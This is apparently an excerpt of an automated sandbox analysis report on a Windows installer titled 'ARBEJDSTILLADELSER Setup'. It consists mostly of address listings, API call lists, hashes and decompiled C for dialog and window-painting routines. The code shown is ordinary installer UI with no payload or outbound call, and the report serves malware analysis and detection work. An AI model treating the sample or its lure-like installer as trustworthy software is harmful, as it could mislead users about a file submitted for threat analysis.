                                                                                                                                                                              0x00405155
                                                                                                                                                                              0x0040515d
                                                                                                                                                                              0x0040519e
                                                                                                                                                                              0x004051a0
                                                                                                                                                                              0x004051a5
                                                                                                                                                                              0x004051b0
                                                                                                                                                                              0x004051b3
                                                                                                                                                                              0x004051b8
                                                                                                                                                                              0x004051bf
                                                                                                                                                                              0x004051c2
                                                                                                                                                                              0x00405264
                                                                                                                                                                              0x0040526d
                                                                                                                                                                              0x00405275
                                                                                                                                                                              0x00405275
                                                                                                                                                                              0x0040527b
                                                                                                                                                                              0x00405283
                                                                                                                                                                              0x00405294
                                                                                                                                                                              0x00405294
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405283
                                                                                                                                                                              0x004051c8
                                                                                                                                                                              0x004051cb
                                                                                                                                                                              0x004051d1
                                                                                                                                                                              0x004051d6
                                                                                                                                                                              0x004051d8
                                                                                                                                                                              0x004051da
                                                                                                                                                                              0x004051e0
                                                                                                                                                                              0x004051e7
                                                                                                                                                                              0x004051ec
                                                                                                                                                                              0x004051f3
                                                                                                                                                                              0x004051f6
                                                                                                                                                                              0x004051f6
                                                                                                                                                                              0x004051fd
                                                                                                                                                                              0x00405209
                                                                                                                                                                              0x0040520d
                                                                                                                                                                              0x0040520f
                                                                                                                                                                              0x0040520f
                                                                                                                                                                              0x004051ff
                                                                                                                                                                              0x00405201
                                                                                                                                                                              0x00405201
                                                                                                                                                                              0x0040522f
                                                                                                                                                                              0x0040523b
                                                                                                                                                                              0x0040524a
                                                                                                                                                                              0x0040524a
                                                                                                                                                                              0x0040524c
                                                                                                                                                                              0x0040524f
                                                                                                                                                                              0x00405258
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040515f
                                                                                                                                                                              0x0040516a
                                                                                                                                                                              0x0040516d
                                                                                                                                                                              0x00405172
                                                                                                                                                                              0x00405174
                                                                                                                                                                              0x00405178
                                                                                                                                                                              0x00405188
                                                                                                                                                                              0x00405192
                                                                                                                                                                              0x00405194
                                                                                                                                                                              0x00405197
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040517a
                                                                                                                                                                              0x0040517a
                                                                                                                                                                              0x00405180
                                                                                                                                                                              0x00405182
                                                                                                                                                                              0x00405182
                                                                                                                                                                              0x00405183
                                                                                                                                                                              0x00405184
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040517a
                                                                                                                                                                              0x0040515d
                                                                                                                                                                              0x00405138
                                                                                                                                                                              0x0040507b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405091
                                                                                                                                                                              0x0040509b
                                                                                                                                                                              0x004050a0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004050b2
                                                                                                                                                                              0x004050b7
                                                                                                                                                                              0x004050c3
                                                                                                                                                                              0x004050c3
                                                                                                                                                                              0x004050c5
                                                                                                                                                                              0x004050d4
                                                                                                                                                                              0x004050d6
                                                                                                                                                                              0x004050da
                                                                                                                                                                              0x004050dd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004050dd
                                                                                                                                                                              0x0040507b
                                                                                                                                                                              0x00404d2f
                                                                                                                                                                              0x00404d32
                                                                                                                                                                              0x00404d35
                                                                                                                                                                              0x00404d45
                                                                                                                                                                              0x00404d58
                                                                                                                                                                              0x00404d63
                                                                                                                                                                              0x00404d69
                                                                                                                                                                              0x00404d77
                                                                                                                                                                              0x00404d8a
                                                                                                                                                                              0x00404d8f
                                                                                                                                                                              0x00404d9a
                                                                                                                                                                              0x00404da3
                                                                                                                                                                              0x00404db9
                                                                                                                                                                              0x00404dc9
                                                                                                                                                                              0x00404dd5
                                                                                                                                                                              0x00404dd5
                                                                                                                                                                              0x00404dda
                                                                                                                                                                              0x00404de0
                                                                                                                                                                              0x00404de2
                                                                                                                                                                              0x00404de5
                                                                                                                                                                              0x00404dea
                                                                                                                                                                              0x00404def
                                                                                                                                                                              0x00404df1
                                                                                                                                                                              0x00404df1
                                                                                                                                                                              0x00404e11
                                                                                                                                                                              0x00404e11
                                                                                                                                                                              0x00404e13
                                                                                                                                                                              0x00404e14
                                                                                                                                                                              0x00404e19
                                                                                                                                                                              0x00404e1f
                                                                                                                                                                              0x00404e23
                                                                                                                                                                              0x00404e28
                                                                                                                                                                              0x00404e30
                                                                                                                                                                              0x00404e34
                                                                                                                                                                              0x00404e39
                                                                                                                                                                              0x00404e3e
                                                                                                                                                                              0x00404e46
                                                                                                                                                                              0x00404e49
                                                                                                                                                                              0x00404f18
                                                                                                                                                                              0x00404f2b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404e4f
                                                                                                                                                                              0x00404e52
                                                                                                                                                                              0x00404e55
                                                                                                                                                                              0x00404e58
                                                                                                                                                                              0x00404e58
                                                                                                                                                                              0x00404e5d
                                                                                                                                                                              0x00404e66
                                                                                                                                                                              0x00404e69
                                                                                                                                                                              0x00404e6d
                                                                                                                                                                              0x00404e70
                                                                                                                                                                              0x00404e73
                                                                                                                                                                              0x00404e7c
                                                                                                                                                                              0x00404e85
                                                                                                                                                                              0x00404e88
                                                                                                                                                                              0x00404e8b
                                                                                                                                                                              0x00404e8e
                                                                                                                                                                              0x00404ecc
                                                                                                                                                                              0x00404eef
                                                                                                                                                                              0x00404ef1
                                                                                                                                                                              0x00404ef7
                                                                                                                                                                              0x00404ece
                                                                                                                                                                              0x00404edd
                                                                                                                                                                              0x00404edd
                                                                                                                                                                              0x00404e90
                                                                                                                                                                              0x00404e93
                                                                                                                                                                              0x00404ea1
                                                                                                                                                                              0x00404eab
                                                                                                                                                                              0x00404ead
                                                                                                                                                                              0x00404eb3
                                                                                                                                                                              0x00404eba
                                                                                                                                                                              0x00404ebd
                                                                                                                                                                              0x00404ec5
                                                                                                                                                                              0x00404ec5
                                                                                                                                                                              0x00404e8e
                                                                                                                                                                              0x00404efd
                                                                                                                                                                              0x00404efe
                                                                                                                                                                              0x00404f0a
                                                                                                                                                                              0x00404f0a
                                                                                                                                                                              0x00404f16
                                                                                                                                                                              0x00404f31
                                                                                                                                                                              0x00404f34
                                                                                                                                                                              0x00404f51
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404f36
                                                                                                                                                                              0x00404f3b
                                                                                                                                                                              0x00404f44
                                                                                                                                                                              0x004052d7
                                                                                                                                                                              0x004052e9
                                                                                                                                                                              0x004052e9
                                                                                                                                                                              0x00404f34
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404f16
                                                                                                                                                                              0x00404e49

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00404CF0
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00404CFD
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D4C
                                                                                                                                                                              • LoadImageA.USER32 ref: 00404D63
                                                                                                                                                                              • SetWindowLongA.USER32 ref: 00404D7D
                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8F
                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA3
                                                                                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB9
                                                                                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC5
                                                                                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD5
                                                                                                                                                                              • DeleteObject.GDI32(00000110), ref: 00404DDA
                                                                                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E05
                                                                                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E11
                                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EAB
                                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EDB
                                                                                                                                                                                • Part of subcall function 00404309: SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEF
                                                                                                                                                                              • GetWindowLongA.USER32 ref: 00404F1D
                                                                                                                                                                              • SetWindowLongA.USER32 ref: 00404F2B
                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404F3B
                                                                                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405036
                                                                                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040509B
                                                                                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050B0
                                                                                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D4
                                                                                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F4
                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 00405109
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00405119
                                                                                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405192
                                                                                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 0040523B
                                                                                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040524A
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405275
                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004052C3
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004052CE
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004052D5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                              • String ID: $M$N
                                                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                                                              • Opcode ID: 0aaace5e7038786aacf0d0ec6efdbd7d394b60eb8694dc7bb3af05aed72767f4
                                                                                                                                                                              • Instruction ID: c814a1149ae8d70461ce7ac85806320f31a4e43cf09a070d2a5393f0519b6fc2
                                                                                                                                                                              • Opcode Fuzzy Hash: 0aaace5e7038786aacf0d0ec6efdbd7d394b60eb8694dc7bb3af05aed72767f4
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E026AB0A00209AFDB20DF64CD45AAE7BB5FB44354F54817AFA10BA2E0C7788D52DF59
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040443F Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                              			E0040443F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x42985c =  *0x42985c + 1;
								__eflags =  *0x42985c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040433B(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42e3c0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E004046E3(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x42985c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t103 =  *0x42a068; // 0x59dddc
					_t25 = _t103 + 0x14; // 0x59ddf0
					_t112 = _t25;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E004042F6(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004046BF();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42ebfc; // 0x5a1993
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42f458;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E0040440A;
					E004042D4(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E004042D4(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E004042F6( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00404309(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x42f430 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x42985c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x42985c = 0;
					return 0;
				}
			}




















                                                                                                                                                                              0x0040444f
                                                                                                                                                                              0x00404561
                                                                                                                                                                              0x00404574
                                                                                                                                                                              0x004045d0
                                                                                                                                                                              0x004045d0
                                                                                                                                                                              0x004045d4
                                                                                                                                                                              0x0040469a
                                                                                                                                                                              0x004046a1
                                                                                                                                                                              0x004046a3
                                                                                                                                                                              0x004046a3
                                                                                                                                                                              0x004046a3
                                                                                                                                                                              0x004046a9
                                                                                                                                                                              0x004046a9
                                                                                                                                                                              0x004046ac
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004046b3
                                                                                                                                                                              0x004045e2
                                                                                                                                                                              0x004045e4
                                                                                                                                                                              0x004045e7
                                                                                                                                                                              0x004045ee
                                                                                                                                                                              0x004045f0
                                                                                                                                                                              0x004045f7
                                                                                                                                                                              0x004045f9
                                                                                                                                                                              0x004045fc
                                                                                                                                                                              0x004045ff
                                                                                                                                                                              0x00404604
                                                                                                                                                                              0x0040460a
                                                                                                                                                                              0x0040460d
                                                                                                                                                                              0x00404614
                                                                                                                                                                              0x00404622
                                                                                                                                                                              0x0040463a
                                                                                                                                                                              0x0040463c
                                                                                                                                                                              0x00404644
                                                                                                                                                                              0x00404653
                                                                                                                                                                              0x00404655
                                                                                                                                                                              0x00404655
                                                                                                                                                                              0x00404614
                                                                                                                                                                              0x004045f7
                                                                                                                                                                              0x00404658
                                                                                                                                                                              0x0040465f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404661
                                                                                                                                                                              0x00404661
                                                                                                                                                                              0x00404668
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040466a
                                                                                                                                                                              0x0040466e
                                                                                                                                                                              0x0040467f
                                                                                                                                                                              0x0040467f
                                                                                                                                                                              0x00404681
                                                                                                                                                                              0x00404685
                                                                                                                                                                              0x00404693
                                                                                                                                                                              0x00404693
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404697
                                                                                                                                                                              0x0040465f
                                                                                                                                                                              0x0040457c
                                                                                                                                                                              0x0040457f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404587
                                                                                                                                                                              0x0040458d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404593
                                                                                                                                                                              0x00404599
                                                                                                                                                                              0x00404599
                                                                                                                                                                              0x0040459c
                                                                                                                                                                              0x0040459f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004045c2
                                                                                                                                                                              0x004045c2
                                                                                                                                                                              0x004045c4
                                                                                                                                                                              0x004045c6
                                                                                                                                                                              0x004045cb
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404455
                                                                                                                                                                              0x00404455
                                                                                                                                                                              0x00404458
                                                                                                                                                                              0x0040445d
                                                                                                                                                                              0x0040445f
                                                                                                                                                                              0x0040446e
                                                                                                                                                                              0x0040446e
                                                                                                                                                                              0x00404475
                                                                                                                                                                              0x00404478
                                                                                                                                                                              0x0040447a
                                                                                                                                                                              0x0040447f
                                                                                                                                                                              0x00404488
                                                                                                                                                                              0x0040448e
                                                                                                                                                                              0x0040449a
                                                                                                                                                                              0x0040449d
                                                                                                                                                                              0x004044a6
                                                                                                                                                                              0x004044ab
                                                                                                                                                                              0x004044ae
                                                                                                                                                                              0x004044b3
                                                                                                                                                                              0x004044ca
                                                                                                                                                                              0x004044d1
                                                                                                                                                                              0x004044e4
                                                                                                                                                                              0x004044e7
                                                                                                                                                                              0x004044fc
                                                                                                                                                                              0x00404503
                                                                                                                                                                              0x00404508
                                                                                                                                                                              0x0040450d
                                                                                                                                                                              0x0040450d
                                                                                                                                                                              0x0040451c
                                                                                                                                                                              0x0040452b
                                                                                                                                                                              0x0040453d
                                                                                                                                                                              0x00404542
                                                                                                                                                                              0x00404552
                                                                                                                                                                              0x00404554
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040455a

                                                                                                                                                                              APIs
                                                                                                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044CA
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004044DE
                                                                                                                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044FC
                                                                                                                                                                              • GetSysColor.USER32(?), ref: 0040450D
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040451C
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040452B
                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040452E
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453D
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404552
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004045B4
                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 004045B7
                                                                                                                                                                              • GetDlgItem.USER32 ref: 004045E2
                                                                                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404622
                                                                                                                                                                              • LoadCursorA.USER32 ref: 00404631
                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040463A
                                                                                                                                                                              • LoadCursorA.USER32 ref: 00404650
                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404653
                                                                                                                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467F
                                                                                                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404693
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                              • String ID: D@$ExecToStack$N
                                                                                                                                                                              • API String ID: 3103080414-2336029164
                                                                                                                                                                              • Opcode ID: 35ee71d5250129fbf2f36168019ba60c9b2f338ba1f9cfece2971a749f388ba2
                                                                                                                                                                              • Instruction ID: ec86402776fd01095bc4262357a67ddb6d4548b01b5252dde79e8ca7eec82ec2
                                                                                                                                                                              • Opcode Fuzzy Hash: 35ee71d5250129fbf2f36168019ba60c9b2f338ba1f9cfece2971a749f388ba2
                                                                                                                                                                              • Instruction Fuzzy Hash: 0761A2B1A00209BBDB10AF61DC45B6A3B68EB84754F10443AFB04BB1D1D7B9A9618F98
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f430;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "ARBEJDSTILLADELSER Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                                                                                              0x0040100a
                                                                                                                                                                              0x00401039
                                                                                                                                                                              0x00401047
                                                                                                                                                                              0x0040104d
                                                                                                                                                                              0x00401051
                                                                                                                                                                              0x0040105b
                                                                                                                                                                              0x00401061
                                                                                                                                                                              0x00401064
                                                                                                                                                                              0x004010f3
                                                                                                                                                                              0x00401089
                                                                                                                                                                              0x0040108c
                                                                                                                                                                              0x004010a6
                                                                                                                                                                              0x004010bd
                                                                                                                                                                              0x004010cc
                                                                                                                                                                              0x004010cf
                                                                                                                                                                              0x004010d5
                                                                                                                                                                              0x004010d9
                                                                                                                                                                              0x004010e4
                                                                                                                                                                              0x004010ed
                                                                                                                                                                              0x004010ef
                                                                                                                                                                              0x004010ef
                                                                                                                                                                              0x00401100
                                                                                                                                                                              0x00401105
                                                                                                                                                                              0x0040110d
                                                                                                                                                                              0x00401110
                                                                                                                                                                              0x00401112
                                                                                                                                                                              0x00401118
                                                                                                                                                                              0x0040111f
                                                                                                                                                                              0x00401126
                                                                                                                                                                              0x00401130
                                                                                                                                                                              0x00401142
                                                                                                                                                                              0x00401156
                                                                                                                                                                              0x00401160
                                                                                                                                                                              0x00401165
                                                                                                                                                                              0x00401165
                                                                                                                                                                              0x00401110
                                                                                                                                                                              0x0040116e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00401178
                                                                                                                                                                              0x00401010
                                                                                                                                                                              0x00401013
                                                                                                                                                                              0x00401015
                                                                                                                                                                              0x0040101f
                                                                                                                                                                              0x0040101f
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                              • FillRect.USER32 ref: 004010E4
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                              • DrawTextA.USER32(00000000,ARBEJDSTILLADELSER Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
